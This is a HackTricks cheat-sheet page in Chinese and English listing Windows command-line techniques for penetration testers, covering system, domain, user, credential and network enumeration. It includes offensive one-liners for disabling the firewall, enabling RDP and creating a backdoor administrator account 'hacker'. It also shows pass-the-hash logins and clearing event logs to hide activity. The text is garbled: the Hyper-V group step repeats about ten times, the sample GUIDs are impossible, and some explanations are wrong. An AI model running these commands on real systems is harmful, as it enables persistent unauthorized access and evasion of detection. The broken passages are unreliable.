hacktricks/windows-hardening/basic-cmd-for-pentesters.md
2023-08-03 19:12:22 +00:00

2909 lines
97 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Pentesters的基本Win CMD
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一个**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>
## 系统信息
### 版本和补丁信息
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
```
### 环境
---
### Basic CMD for Pentesters
### 渗透测试人员的基本CMD命令
---
#### CMD Basics
#### CMD基础知识
CMD (Command Prompt) is a command-line interpreter for Windows operating systems. It allows users to execute commands and perform various tasks using a text-based interface.
CMD命令提示符是Windows操作系统的命令行解释器。它允许用户使用基于文本的界面执行命令和执行各种任务。
Here are some basic CMD commands that can be useful for pentesters:
以下是一些对渗透测试人员有用的基本CMD命令
#### System Information
#### 系统信息
- `systeminfo`: Displays detailed information about the computer's hardware and software configuration.
- `systeminfo`:显示计算机硬件和软件配置的详细信息。
#### Network Information
#### 网络信息
- `ipconfig`: Displays the IP configuration for all network interfaces on the computer.
- `ipconfig`显示计算机上所有网络接口的IP配置。
- `netstat`: Displays active network connections, listening ports, and related network statistics.
- `netstat`:显示活动的网络连接、监听端口和相关的网络统计信息。
#### File and Directory Management
#### 文件和目录管理
- `dir`: Lists the files and directories in the current directory.
- `dir`:列出当前目录中的文件和目录。
- `cd`: Changes the current directory.
- `cd`:更改当前目录。
- `mkdir`: Creates a new directory.
- `mkdir`:创建一个新目录。
- `del`: Deletes a file.
- `del`:删除一个文件。
#### Process Management
#### 进程管理
- `tasklist`: Displays a list of currently running processes.
- `tasklist`:显示当前正在运行的进程列表。
- `taskkill`: Terminates a running process.
- `taskkill`:终止正在运行的进程。
#### User Management
#### 用户管理
- `net user`: Displays information about user accounts and allows for user management.
- `net user`:显示有关用户帐户的信息,并允许进行用户管理。
#### Registry Management
#### 注册表管理
- `reg query`: Displays the values and subkeys of a specified registry key.
- `reg query`:显示指定注册表键的值和子键。
- `reg add`: Adds a new registry entry or modifies an existing one.
- `reg add`:添加新的注册表项或修改现有的注册表项。
#### Service Management
#### 服务管理
- `sc query`: Displays the status of services on the computer.
- `sc query`:显示计算机上服务的状态。
- `sc start`: Starts a service.
- `sc start`:启动一个服务。
- `sc stop`: Stops a running service.
- `sc stop`:停止正在运行的服务。
#### Task Scheduler
#### 任务计划程序
- `schtasks`: Displays or modifies scheduled tasks on the computer.
- `schtasks`:显示或修改计算机上的计划任务。
#### Remote Desktop
#### 远程桌面
- `mstsc`: Opens the Remote Desktop Connection client.
- `mstsc`:打开远程桌面连接客户端。
#### Conclusion
#### 结论
These are just a few basic CMD commands that can be useful for pentesters. CMD provides a wide range of functionalities for managing and interacting with the Windows operating system. Exploring and understanding these commands can greatly enhance a pentester's capabilities.
这些只是一些对渗透测试人员有用的基本CMD命令。CMD提供了广泛的功能用于管理和与Windows操作系统进行交互。探索和理解这些命令可以极大地增强渗透测试人员的能力。
```bash
set #List all environment variables
```
一些需要强调的环境变量:
* **COMPUTERNAME**: 计算机名称
* **TEMP/TMP:** 临时文件夹
* **USERNAME:** 用户名
* **HOMEPATH/USERPROFILE:** 主目录
* **windir:** C:\Windows
* **OS**: Windows 操作系统
* **LOGONSERVER**: 域控制器名称
* **USERDNSDOMAIN**: 用于 DNS 的域名
* **USERDOMAIN**: 域名
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
### 挂载的磁盘
When performing a penetration test on a Windows system, it is important to understand the mounted disks. Mounted disks are additional storage devices that have been attached to the system and are accessible to the operating system.
在对Windows系统进行渗透测试时了解挂载的磁盘非常重要。挂载的磁盘是附加到系统上并可被操作系统访问的额外存储设备。
To view the mounted disks on a Windows system, you can use the `mountvol` command. This command displays a list of all the mounted volumes along with their corresponding volume names and paths.
要查看Windows系统上的挂载磁盘可以使用`mountvol`命令。该命令会显示所有挂载卷的列表,包括相应的卷名和路径。
```plaintext
C:\> mountvol
Possible values for VolumeName along with current mount points are:
\\?\Volume{d3e5e6f7-8a9b-1c2d-3e4f-5g6h7i8j9k0l}\
*** NO MOUNT POINTS ***
\\?\Volume{a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6}\
C:\
\\?\Volume{m3n4o5p6-q7r8-s9t0-u1v2-w3x4y5z6a7b8}\
D:\
```
The output of the `mountvol` command shows the volume names and their corresponding mount points. In the example above, the `C:` drive is mounted to the volume named `{a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6}` and the `D:` drive is mounted to the volume named `{m3n4o5p6-q7r8-s9t0-u1v2-w3x4y5z6a7b8}`.
`mountvol`命令的输出显示了卷名及其相应的挂载点。在上面的示例中,`C:`驱动器挂载到名为`{a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6}`的卷上,而`D:`驱动器挂载到名为`{m3n4o5p6-q7r8-s9t0-u1v2-w3x4y5z6a7b8}`的卷上。
Understanding the mounted disks can be useful during a penetration test as it allows you to identify additional storage devices that may contain sensitive information or provide potential attack vectors.
了解挂载的磁盘在渗透测试中非常有用,因为它可以帮助您识别可能包含敏感信息或提供潜在攻击向量的附加存储设备。
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```
### [防御者](authentication-credentials-uac-and-efs.md#defender)
### 回收站
```bash
dir C:\$Recycle.Bin /s /b
```
### 进程、服务和软件
#### Processes 进程
##### List processes 列出进程
To list all running processes, you can use the `tasklist` command:
```plaintext
tasklist
```
要列出所有正在运行的进程,可以使用 `tasklist` 命令:
```plaintext
tasklist
```
##### Kill a process 终止进程
To terminate a process, you can use the `taskkill` command followed by the process ID (PID) or the process name:
```plaintext
taskkill /PID <PID>
taskkill /IM <process_name>
```
要终止一个进程,可以使用 `taskkill` 命令,后面跟着进程的进程 IDPID或进程名
```plaintext
taskkill /PID <PID>
taskkill /IM <process_name>
```
#### Services 服务
##### List services 列出服务
To list all services, you can use the `sc` command:
```plaintext
sc query
```
要列出所有服务,可以使用 `sc` 命令:
```plaintext
sc query
```
##### Start/Stop a service 启动/停止服务
To start or stop a service, you can use the `sc` command followed by the service name and the desired action:
```plaintext
sc start <service_name>
sc stop <service_name>
```
要启动或停止一个服务,可以使用 `sc` 命令,后面跟着服务名和所需的操作:
```plaintext
sc start <service_name>
sc stop <service_name>
```
#### Software 软件
##### List installed software 列出已安装的软件
To list all installed software, you can use the `wmic` command:
```plaintext
wmic product get name,version
```
要列出所有已安装的软件,可以使用 `wmic` 命令:
```plaintext
wmic product get name,version
```
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
## 域名信息
### Whois
```plaintext
whois <domain>
```
使用`whois`命令可以获取域名的注册信息,包括注册人、注册商、注册日期等。
### DNS
```plaintext
nslookup <domain>
```
使用`nslookup`命令可以查询域名的DNS记录包括域名解析服务器和IP地址。
### Zone Transfer
```plaintext
nslookup
> server <dns-server>
> ls -d <domain>
```
使用`nslookup`命令进行区域传输可以获取域名的完整DNS记录。
### MX Records
```plaintext
nslookup -type=mx <domain>
```
使用`nslookup`命令查询域名的MX记录可以获取与该域名关联的邮件服务器信息。
### SPF Records
```plaintext
nslookup -type=txt <domain>
```
使用`nslookup`命令查询域名的SPF记录可以获取与该域名关联的反垃圾邮件策略信息。
### Subdomains
```plaintext
nslookup -type=ns <domain>
```
使用`nslookup`命令查询域名的子域名,可以获取与该域名关联的子域名信息。
### Zone Transfer
```plaintext
dig axfr @<dns-server> <domain>
```
使用`dig`命令进行区域传输可以获取域名的完整DNS记录。
### MX Records
```plaintext
dig mx <domain>
```
使用`dig`命令查询域名的MX记录可以获取与该域名关联的邮件服务器信息。
### SPF Records
```plaintext
dig txt <domain>
```
使用`dig`命令查询域名的SPF记录可以获取与该域名关联的反垃圾邮件策略信息。
### Subdomains
```plaintext
dig ns <domain>
```
使用`dig`命令查询域名的子域名,可以获取与该域名关联的子域名信息。
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
### 日志和事件
Logs and events are crucial sources of information for a pentester. They provide valuable insights into the activities and behaviors of a system or network. By analyzing logs and events, a pentester can identify vulnerabilities, detect suspicious activities, and gain a better understanding of the target environment.
日志和事件是渗透测试人员的重要信息来源。它们提供了有关系统或网络活动和行为的宝贵见解。通过分析日志和事件,渗透测试人员可以识别漏洞,检测可疑活动,并更好地了解目标环境。
#### Windows Event Logs
#### Windows事件日志
Windows operating systems generate various event logs that record important system events. These logs can be accessed using the Event Viewer tool or the command-line interface. The following are some commonly used Windows event logs:
Windows操作系统会生成记录重要系统事件的各种事件日志。可以使用事件查看器工具或命令行界面访问这些日志。以下是一些常用的Windows事件日志
- **Application Log**: Records events related to applications and programs.
- **应用程序日志**:记录与应用程序和程序相关的事件。
- **Security Log**: Records security-related events such as logon attempts, privilege use, and system access.
- **安全日志**:记录与安全相关的事件,如登录尝试、权限使用和系统访问。
- **System Log**: Records events related to the operating system and system components.
- **系统日志**:记录与操作系统和系统组件相关的事件。
- **Setup Log**: Records events related to the installation of software and hardware.
- **安装日志**:记录与软件和硬件安装相关的事件。
- **Forwarded Events**: Records events forwarded from other computers in the network.
- **转发的事件**:记录从网络中的其他计算机转发的事件。
#### Event Log Clearing
#### 清除事件日志
As a pentester, it is important to clear event logs to cover your tracks and avoid detection. The following command can be used to clear event logs:
作为渗透测试人员,清除事件日志以覆盖你的踪迹并避免被检测是很重要的。可以使用以下命令清除事件日志:
```plaintext
wevtutil cl <log_name>
```
Replace `<log_name>` with the name of the event log you want to clear, such as "Application", "Security", or "System".
将`<log_name>`替换为要清除的事件日志的名称,例如“应用程序”、“安全”或“系统”。
#### Event Log Backup
#### 事件日志备份
Backing up event logs is essential for preserving evidence and maintaining a record of system activities. The following command can be used to back up event logs:
备份事件日志对于保留证据和记录系统活动至关重要。可以使用以下命令备份事件日志:
```plaintext
wevtutil epl <log_name> <backup_file.evtx>
```
Replace `<log_name>` with the name of the event log you want to back up, and `<backup_file.evtx>` with the desired backup file name.
将`<log_name>`替换为要备份的事件日志的名称,将`<backup_file.evtx>`替换为所需的备份文件名。
#### Event Log Monitoring
#### 事件日志监控
Monitoring event logs in real-time can help detect and respond to security incidents promptly. The following command can be used to monitor event logs:
实时监控事件日志可以帮助及时检测和响应安全事件。可以使用以下命令监控事件日志:
```plaintext
wevtutil qe <log_name> /f:text /c:1 /rd:true
```
Replace `<log_name>` with the name of the event log you want to monitor, such as "Application", "Security", or "System".
将`<log_name>`替换为要监控的事件日志的名称,例如“应用程序”、“安全”或“系统”。
#### Windows Event Forwarding
#### Windows事件转发
Windows Event Forwarding allows you to collect events from multiple computers in a centralized location for analysis. The following steps outline the process of configuring Windows Event Forwarding:
Windows事件转发允许你将多台计算机的事件收集到一个集中位置进行分析。以下步骤概述了配置Windows事件转发的过程
1. Configure the event source computer to forward events to a collector computer.
2. Configure the collector computer to collect events from the event source computer.
3. Verify that events are being forwarded and collected successfully.
1. 配置事件源计算机将事件转发到收集器计算机。
2. 配置收集器计算机从事件源计算机收集事件。
3. 验证事件是否成功转发和收集。
#### Sysmon
#### Sysmon
Sysmon (System Monitor) is a powerful Windows utility that provides detailed information about system activity. It can be used to monitor and log events related to process creation, network connections, file creation, and more. Sysmon logs can be analyzed to identify malicious activities and indicators of compromise.
Sysmon系统监视器是一个强大的Windows实用程序提供有关系统活动的详细信息。它可以用于监视和记录与进程创建、网络连接、文件创建等相关的事件。可以分析Sysmon日志以识别恶意活动和妥协指标。
#### Event Log Analysis
#### 事件日志分析
Analyzing event logs is an essential part of the pentesting process. It helps identify security weaknesses, detect suspicious activities, and uncover potential attack vectors. The following are some key areas to focus on when analyzing event logs:
分析事件日志是渗透测试过程的重要组成部分。它有助于识别安全弱点,检测可疑活动,并揭示潜在的攻击向量。在分析事件日志时,应重点关注以下几个关键领域:
- Look for failed login attempts and brute-force attacks.
- 寻找登录尝试失败和暴力破解攻击。
- Identify privilege escalation attempts.
- 识别权限提升尝试。
- Monitor for suspicious network connections and traffic.
- 监控可疑的网络连接和流量。
- Analyze process creation events for signs of malicious activity.
- 分析进程创建事件以寻找恶意活动的迹象。
- Check for unauthorized access attempts and suspicious file modifications.
- 检查未经授权的访问尝试和可疑的文件修改。
By carefully analyzing event logs, a pentester can gain valuable insights into the security posture of a system or network and identify potential vulnerabilities or security breaches.
通过仔细分析事件日志,渗透测试人员可以深入了解系统或网络的安全状况,并识别潜在的漏洞或安全漏洞。
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
## 用户和组
### 用户
#### 查看当前登录用户
```bash
whoami
```
#### 查看所有用户
```bash
net user
```
#### 查看用户详细信息
```bash
net user <username>
```
#### 创建新用户
```bash
net user <username> <password> /add
```
#### 删除用户
```bash
net user <username> /delete
```
#### 修改用户密码
```bash
net user <username> <new_password>
```
### 组
#### 查看所有组
```bash
net localgroup
```
#### 查看组成员
```bash
net localgroup <groupname>
```
#### 创建新组
```bash
net localgroup <groupname> /add
```
#### 删除组
```bash
net localgroup <groupname> /delete
```
#### 将用户添加到组
```bash
net localgroup <groupname> <username> /add
```
#### 从组中删除用户
```bash
net localgroup <groupname> <username> /delete
```
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
# Other users looged
qwinsta #Anyone else logged in?
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```
### 用户组
User groups are a way to organize and manage users on a system. Each user can be a member of one or more groups, and groups can have certain permissions and access rights assigned to them. In Windows, there are several built-in groups that serve specific purposes. Here are some commonly used groups:
- **Administrators**: This group has full control over the system and can perform any administrative task.
- **Users**: This group includes all standard users on the system.
- **Guests**: This group provides limited access to the system for guest users.
- **Power Users**: This group has more privileges than standard users but fewer than administrators.
- **Backup Operators**: Members of this group can perform backup and restore operations on the system.
- **Remote Desktop Users**: This group is allowed to access the system remotely using Remote Desktop.
- **Network Configuration Operators**: Members of this group can manage network configuration settings.
- **Print Operators**: Members of this group can manage printers on the system.
- **Event Log Readers**: Members of this group can read event logs on the system.
To view the groups on a Windows system, you can use the `net localgroup` command. For example, to list all the groups, you can run:
```plaintext
net localgroup
```
To view the members of a specific group, you can use the `net localgroup <groupname>` command. For example, to view the members of the Administrators group, you can run:
```plaintext
net localgroup Administrators
```
To add a user to a group, you can use the `net localgroup <groupname> <username> /add` command. For example, to add a user named "john" to the Administrators group, you can run:
```plaintext
net localgroup Administrators john /add
```
To remove a user from a group, you can use the `net localgroup <groupname> <username> /delete` command. For example, to remove a user named "john" from the Administrators group, you can run:
```plaintext
net localgroup Administrators john /delete
```
Remember that administrative privileges are required to perform these operations.
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group
```
### 列出会话
To list the active sessions in a Windows system, you can use the following command:
```plaintext
C:\> net session
```
This command will display a list of all active sessions on the system, including the username, computer name, and session ID.
```
qwinsta
klist sessions
```
### 密码策略
A strong password policy is essential for maintaining the security of a system. It helps to prevent unauthorized access and protects sensitive information. Here are some key elements to consider when implementing a password policy:
- **Password Complexity**: Require users to create passwords that are complex and difficult to guess. This can be achieved by enforcing a minimum length, including a combination of uppercase and lowercase letters, numbers, and special characters.
- **Password Expiration**: Set a time limit for password expiration. This ensures that users regularly update their passwords and reduces the risk of compromised accounts.
- **Password History**: Implement a password history feature that prevents users from reusing their previous passwords. This helps to prevent attackers from gaining access to an account by guessing a previously used password.
- **Account Lockout**: Implement an account lockout policy that temporarily locks an account after a certain number of failed login attempts. This helps to prevent brute-force attacks and unauthorized access.
- **Password Recovery**: Implement a secure password recovery process that verifies the identity of the user before allowing them to reset their password. This helps to prevent unauthorized password resets.
By implementing a strong password policy, organizations can significantly enhance the security of their systems and protect against unauthorized access.
```
net accounts
```
### 凭证
Credentials (凭证) 是用于验证用户身份的信息,通常包括用户名和密码。在渗透测试中,获取凭证是一项重要的任务,因为它可以帮助我们获得对目标系统的访问权限。
以下是一些常见的凭证获取技术:
- 社会工程学:通过欺骗、诱骗或操纵人员来获取凭证信息。
- 字典攻击:使用预先生成的密码列表尝试猜测用户密码。
- 暴力破解:通过尝试所有可能的密码组合来破解用户密码。
- 嗅探:截获网络流量以获取凭证信息。
- 中间人攻击:在用户和目标系统之间插入自己的设备,以截获凭证信息。
- 操作系统漏洞利用:利用操作系统的漏洞来获取凭证信息。
在渗透测试中,我们可以使用这些技术来获取目标系统的凭证,从而进一步深入系统并执行其他攻击。
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
### 持久化与用户
#### Add a user to the local administrators group
#### 将用户添加到本地管理员组
```plaintext
net localgroup administrators <username> /add
```
#### Add a user to the local Remote Desktop Users group
#### 将用户添加到本地远程桌面用户组
```plaintext
net localgroup "Remote Desktop Users" <username> /add
```
#### Add a user to the local Remote Management Users group
#### 将用户添加到本地远程管理用户组
```plaintext
net localgroup "Remote Management Users" <username> /add
```
#### Add a user to the local Power Users group
#### 将用户添加到本地Power Users组
```plaintext
net localgroup "Power Users" <username> /add
```
#### Add a user to the local Backup Operators group
#### 将用户添加到本地备份操作员组
```plaintext
net localgroup "Backup Operators" <username> /add
```
#### Add a user to the local Performance Monitor Users group
#### 将用户添加到本地性能监视器用户组
```plaintext
net localgroup "Performance Monitor Users" <username> /add
```
#### Add a user to the local Performance Log Users group
#### 将用户添加到本地性能日志用户组
```plaintext
net localgroup "Performance Log Users" <username> /add
```
#### Add a user to the local Event Log Readers group
#### 将用户添加到本地事件日志读取器组
```plaintext
net localgroup "Event Log Readers" <username> /add
```
#### Add a user to the local Distributed COM Users group
#### 将用户添加到本地分布式COM用户组
```plaintext
net localgroup "Distributed COM Users" <username> /add
```
#### Add a user to the local IIS_IUSRS group
#### 将用户添加到本地IIS_IUSRS组
```plaintext
net localgroup "IIS_IUSRS" <username> /add
```
#### Add a user to the local Cryptographic Operators group
#### 将用户添加到本地加密操作员组
```plaintext
net localgroup "Cryptographic Operators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
#### Add a user to the local Hyper-V Administrators group
#### 将用户添加到本地Hyper-V管理员组
```plaintext
net localgroup "Hyper-V Administrators" <username> /add
```
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
## 网络
### 接口、路由、端口、主机和DNS缓存
#### Interfaces (接口)
To view the network interfaces on a Windows system, you can use the `ipconfig` command. This command will display information about all the network interfaces, including their IP addresses, subnet masks, and default gateways.
```plaintext
ipconfig
```
#### Routes (路由)
To view the routing table on a Windows system, you can use the `route print` command. This command will display information about the routes configured on the system, including the destination network, subnet mask, gateway, and interface.
```plaintext
route print
```
#### Ports (端口)
To view the open ports on a Windows system, you can use the `netstat` command. This command will display a list of all the active connections and listening ports on the system.
```plaintext
netstat -ano
```
#### Hosts (主机)
To view the hosts file on a Windows system, you can use the `notepad` command. This command will open the hosts file in Notepad, allowing you to view and edit its contents.
```plaintext
notepad C:\Windows\System32\drivers\etc\hosts
```
#### DNSCache (DNS缓存)
To view the DNS cache on a Windows system, you can use the `ipconfig /displaydns` command. This command will display a list of all the DNS entries that have been cached by the system.
```plaintext
ipconfig /displaydns
```
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
### 防火墙
A firewall is a network security device that monitors and filters incoming and outgoing network traffic based on predetermined security rules. It acts as a barrier between a trusted internal network and an untrusted external network, such as the internet. Firewalls can be implemented as hardware devices or software programs.
防火墙是一种网络安全设备,根据预定的安全规则监控和过滤进出的网络流量。它充当可信任的内部网络和不可信任的外部网络(如互联网)之间的屏障。防火墙可以作为硬件设备或软件程序实现。
Firewalls can be configured to allow or block specific types of traffic based on various criteria, such as source IP address, destination IP address, port number, and protocol. They help protect networks from unauthorized access, malicious attacks, and data breaches.
防火墙可以根据各种标准如源IP地址、目标IP地址、端口号和协议配置允许或阻止特定类型的流量。它们有助于保护网络免受未经授权的访问、恶意攻击和数据泄露的影响。
Firewalls are an essential component of network security and are commonly used in both home and enterprise environments. They provide an additional layer of defense by controlling and monitoring network traffic, reducing the risk of unauthorized access and potential security breaches.
防火墙是网络安全的重要组成部分,广泛应用于家庭和企业环境。它们通过控制和监控网络流量提供了额外的防御层,降低了未经授权访问和潜在安全漏洞的风险。
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
### 共享
Shares共享是指在Windows系统中共享文件夹或打印机以便其他用户可以访问和使用它们。共享可以在本地网络上的多台计算机之间共享文件和资源。
#### 查看共享
要查看当前系统上的共享,可以使用以下命令:
```plaintext
net share
```
这将显示所有共享的名称和路径。
#### 创建共享
要创建一个新的共享,可以使用以下命令:
```plaintext
net share <share_name>=<path> [/GRANT:<user>,<permissions>] [/REMARK:<text>]
```
其中,`<share_name>` 是共享的名称,`<path>` 是共享的路径。可选的 `/GRANT` 参数用于指定用户和权限,`/REMARK` 参数用于添加备注。
#### 删除共享
要删除一个共享,可以使用以下命令:
```plaintext
net share <share_name> /DELETE
```
其中,`<share_name>` 是要删除的共享的名称。
#### 修改共享权限
要修改共享的权限,可以使用以下命令:
```plaintext
net share <share_name> /GRANT:<user>,<permissions>
```
其中,`<share_name>` 是要修改权限的共享的名称,`<user>` 是要授予权限的用户,`<permissions>` 是要授予的权限。
#### 连接共享
要连接到一个共享,可以使用以下命令:
```plaintext
net use <drive_letter>: \\server\share [/USER:<user>] [<password>]
```
